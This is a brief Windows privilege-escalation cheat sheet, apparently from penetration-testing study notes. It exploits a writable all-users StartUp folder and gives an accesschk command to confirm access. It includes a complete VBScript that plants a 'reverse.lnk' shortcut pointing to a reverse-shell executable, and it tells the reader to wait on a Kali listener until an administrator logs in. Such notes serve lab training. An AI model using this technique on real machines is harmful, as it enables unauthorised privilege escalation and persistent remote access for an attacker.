Startup

Will only be triggered when an administrator or equivalent logins.

Check if we have access: accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
Use this script below to create a shortcut (must be shortcut!)
Run the script using: cscript CreateShortcut.vbs
Start listener on Kali and wait until admin logins

CreateShortcut.vbs

Set oWS = WScript.CreateObject("WScript.Shell")
sLinkFile = "C:\ProgramData\Microsoft\Windows\Start
Menu\Programs\StartUp\reverse.lnk"
Set oLink = oWS.CreateShortcut(sLinkFile)
oLink.TargetPath = "C:\PrivEsc\reverse.exe"
oLink.Save